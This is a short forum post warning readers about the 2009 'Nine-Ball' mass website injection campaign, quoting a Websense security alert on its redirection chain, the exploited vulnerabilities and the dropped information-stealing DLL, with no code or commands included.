Nine-Ball Mass Injection attack compromises 40,000 Websites

  Please be careful with website visitations as malicious attacks continue to compromise some sites that may not be locked down well from a security standpoint. 

Nine-Ball Mass Injection attack compromises 40,000 Websites
http://www.eweek.com/c/a/Security/40000-Web-Sites-Compromised-in-Mass-Attack-227486/
http://securitylabs.websense.com/content/Alerts/3421.aspx
http://vil.nai.com/vil/content/v_141590.htm

QUOTE: Websense Security Labs has detected another large mass injection attack in the wild after the Beladen and Gumblar attacks. We are calling this mass compromise Nine-Ball because of the final landing site. We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.

After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate. This dropper drops a dll with the name SOCKET2.DLL to Windows' system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate.